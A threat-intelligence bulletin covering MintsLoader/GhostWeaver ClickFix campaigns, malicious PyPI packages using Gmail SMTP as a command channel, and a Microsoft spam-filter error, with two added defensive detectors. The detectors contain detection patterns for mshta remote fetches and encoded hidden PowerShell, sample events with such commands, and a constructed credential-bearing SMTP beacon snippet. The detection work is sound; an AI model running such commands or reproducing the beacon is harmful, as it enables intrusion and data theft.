TRENDING TOPICS MAY 02, 2025

Update: MintsLoader and GhostWeaver Malware Campaigns Now Utilizing ClickFix  

Threat actors use a malware loader, MintsLoader, to deploy the remote access trojan GhostWeaver through increasingly sophisticated phishing and drive-by campaigns. Since early 2023, MintsLoader has used a multi-stage infection process involving obfuscated JavaScript and PowerShell scripts that evade detection by avoiding sandbox environments and virtual machines. Once executed, the loader uses a domain generation algorithm (DGA) to establish command-and-control communication and deliver follow-on payloads, including GhostWeaver, StealC and modified BOINC clients. Recent attacks have used ClickFix—a social engineering tactic that tricks users into executing code manually—disguised as prompts to fix system errors or complete security verifications. These fake update lures have been linked to broader e-crime ecosystems tied to groups like SocGholish and LandUpdate808, which have previously targeted legal, industrial, and energy sectors. GhostWeaver builds on the infection chain by maintaining persistent, encrypted communication with its command-and-control infrastructure using TLS and a hard-coded, obfuscated certificate. It downloads additional plugins to steal browser data, manipulate content, and maintain remote access over time. Researchers have also observed the malware using ClickFix and MSHTA-based techniques to deploy other info-stealers like Lumma, making these campaigns increasingly versatile and harder to track. The malware’s ability to redeploy MintsLoader for further infections reinforces its modular and persistent nature. These operations highlight a rising trend in threat actor sophistication, where seemingly simple loaders are central to long-term espionage and data theft efforts across multiple sectors.   
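ClickFix and MSHTA-based delivery, as described above, leave a characteristic process lineage: the interpreter the victim was tricked into launching is a child of the shell rather than of a document handler. The detector below is an added example written for this summary, not code from the cited researchers; the Sysmon-style field names, the scoring weights and the SAMPLE_EVENTS are assumptions and constructed data.

```python
"""ClickFix triage over constructed process-creation events: an added,
illustrative detector, not the researchers' or any vendor's code. ClickFix
makes the victim paste a command into the Run dialog or a terminal, so the
interpreter (mshta/powershell) appears as a child of explorer.exe; the
key=value fields below stand in for Sysmon Event ID 1 / EDR telemetry."""
import re

LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe"}
INDICATORS = [  # (pattern over the command line, reason reported)
    (re.compile(r"mshta\.exe\s+https?://", re.I), "mshta fetching a remote HTA"),
    (re.compile(r"-(w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(e|enc|encodedcommand)\s", re.I), "encoded PowerShell"),
    (re.compile(r"(iwr|invoke-webrequest|downloadstring)", re.I), "remote download"),
]

def parse_event(line):
    """Parse 'Key=value' pairs; values may be double-quoted."""
    return {k.lower(): v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}

def score_event(evt):
    """Return (score, reasons) for one parsed event; 0 means not interesting."""
    image = evt.get("image", "").rsplit("\\", 1)[-1].lower()
    parent = evt.get("parentimage", "").rsplit("\\", 1)[-1].lower()
    if image not in LOLBINS:
        return 0, []
    score, reasons = 0, []
    if parent == "explorer.exe":  # Run dialog / shell launch, not a document handler
        score, reasons = score + 2, reasons + ["interpreter spawned by explorer.exe"]
    for rx, why in INDICATORS:
        if rx.search(evt.get("commandline", "")):
            score, reasons = score + 2, reasons + [why]
    return score, reasons

def find_clickfix(lines, threshold=4):
    """Return (ProcessId, score, reasons) for events at or above threshold."""
    hits = []
    for line in lines:
        evt = parse_event(line)
        score, reasons = score_event(evt)
        if score >= threshold:
            hits.append((evt.get("processid"), score, reasons))
    return hits

# Constructed sample telemetry with a placeholder host (not real IoCs).
SAMPLE_EVENTS = [
    'ProcessId=4412 Image="C:\\Windows\\System32\\mshta.exe" ParentImage="C:\\Windows\\explorer.exe" CommandLine="mshta.exe https://placeholder.invalid/verify.hta"',
    'ProcessId=4420 Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" ParentImage="C:\\Windows\\explorer.exe" CommandLine="powershell.exe -w hidden -enc PLACEHOLDER"',
    'ProcessId=4431 Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" ParentImage="C:\\Program Files\\VSCode\\Code.exe" CommandLine="powershell.exe -NoProfile -File build.ps1"',
]
```

The third sample event (an editor launching a build script) scores zero, which is the point of weighting parent lineage and command-line indicators together rather than alerting on every PowerShell start.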

Malicious Python Packages Abused Gmail SMTP to Create Covert Command Channels  

A recently discovered supply chain attack targeting the Python open-source ecosystem has revealed the use of Gmail’s SMTP service to establish covert communication tunnels for remote command execution. Socket’s Threat Research Team uncovered seven interconnected malicious packages published on the Python Package Index (PyPI), all masquerading as developer tools under names like Coffin-Codes-Pro and Coffin2022. Once installed, these packages connect to Gmail’s servers using hardcoded credentials and send encrypted beacons to attacker-controlled email accounts. Because the traffic flows through Gmail’s trusted infrastructure, it bypassed most network security systems undetected, evading traditional perimeter defenses and blending into normal email flows. After the initial connection, the implants opened WebSocket tunnels to receive remote commands, enabling attackers to exfiltrate sensitive data, move laterally within networks, execute shell commands, and manipulate systems remotely. The campaign’s persistence and evolution, dating back to 2021, show a methodical approach to compromising developer environments through trusted software channels. While the packages have been removed from PyPI, their long-standing presence highlights the difficulty of securing open-source software ecosystems. The incident underscores a growing trend of stealthy, modular malware delivered through legitimate development tools, reinforcing the need for continuous code auditing and threat monitoring in the software supply chain.
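The beacon pattern described above (an SMTP session to Gmail with credentials baked into the package) is something a package audit can catch statically before installation. The checker below is an added example written for this summary, not Socket’s tooling and not code from the malicious packages; the smtplib calls and the Gmail host come from the summary, while the SAMPLE source is constructed.

```python
"""Static audit for Python packages that beacon over Gmail SMTP with
hardcoded credentials: an added, illustrative check, not Socket's tooling
and not code from the malicious packages. It parses source with the ast
module and reports smtplib.SMTP / SMTP_SSL calls aimed at a Gmail host and
login() calls whose username and password are both string literals."""
import ast

GMAIL_HOSTS = {"smtp.gmail.com"}

def _dotted(node):
    """Dotted name for a Name/Attribute callee, else None."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return None

def audit_source(src, path="<memory>"):
    """Return findings as (path, line, description) tuples."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        callee = _dotted(node.func) or ""
        # smtplib.SMTP("smtp.gmail.com", 587) or SMTP_SSL(host="smtp.gmail.com")
        if callee.split(".")[-1] in ("SMTP", "SMTP_SSL"):
            hosts = node.args[:1] + [kw.value for kw in node.keywords if kw.arg == "host"]
            for h in hosts:
                if isinstance(h, ast.Constant) and str(h.value).lower() in GMAIL_HOSTS:
                    findings.append((path, node.lineno, f"SMTP session to Gmail host {h.value}"))
        # server.login("user", "password") with both arguments as string literals
        creds = node.args[:2]
        if callee.endswith(".login") and len(creds) == 2 and all(
                isinstance(a, ast.Constant) and isinstance(a.value, str) for a in creds):
            findings.append((path, node.lineno, "login() with hardcoded string credentials"))
    return findings

# Constructed sample mimicking the described beacon (not a real package).
SAMPLE = '''
import smtplib
def beacon(hostname):
    s = smtplib.SMTP("smtp.gmail.com", 587)
    s.starttls()
    s.login("operator.mailbox@gmail.com", "app-password-placeholder")
    s.sendmail("a@gmail.com", ["b@gmail.com"], hostname)
'''
```

To audit an unpacked sdist or wheel, run audit_source over each .py file under the extracted directory and treat files that raise SyntaxError (often a sign of obfuscation) as needing manual review.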

Update: Microsoft Fixes Faulty Machine Learning Update That Misclassified Gmail Emails as Spam  

Microsoft has resolved a machine learning error in Exchange Online that incorrectly flagged Gmail messages as malicious, sending legitimate emails to users’ junk folders. The issue, logged as EX1064599 in the Microsoft 365 admin center, began on April 25, 2025, and was tied to a misconfigured machine-learning model designed to filter risky email content. According to Microsoft, the model mistakenly associated certain characteristics of legitimate Gmail traffic with known spam campaigns, leading to widespread false positives. While the company did not disclose the number of affected users or regions, the incident reached a severity level where administrators had to implement manual rules to prevent further email disruptions. By May 1, Microsoft confirmed it had fully reverted the flawed model to its prior version, effectively mitigating the issue and restoring normal service behavior. The company stated that telemetry data confirmed the resolution, but this is only the latest in a series of similar incidents involving Exchange Online’s spam filters. Over the past year, Microsoft has addressed multiple machine learning misclassifications, including one that incorrectly quarantined Adobe emails and another that wrongly flagged emails as containing malicious embedded images. These recurring events raise concerns about the reliability of automated spam detection, especially when machine learning models are updated without adequate testing. Microsoft has pledged to enhance the robustness of its email filtering system and explore improvements to reduce false positives in future updates.

💡
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.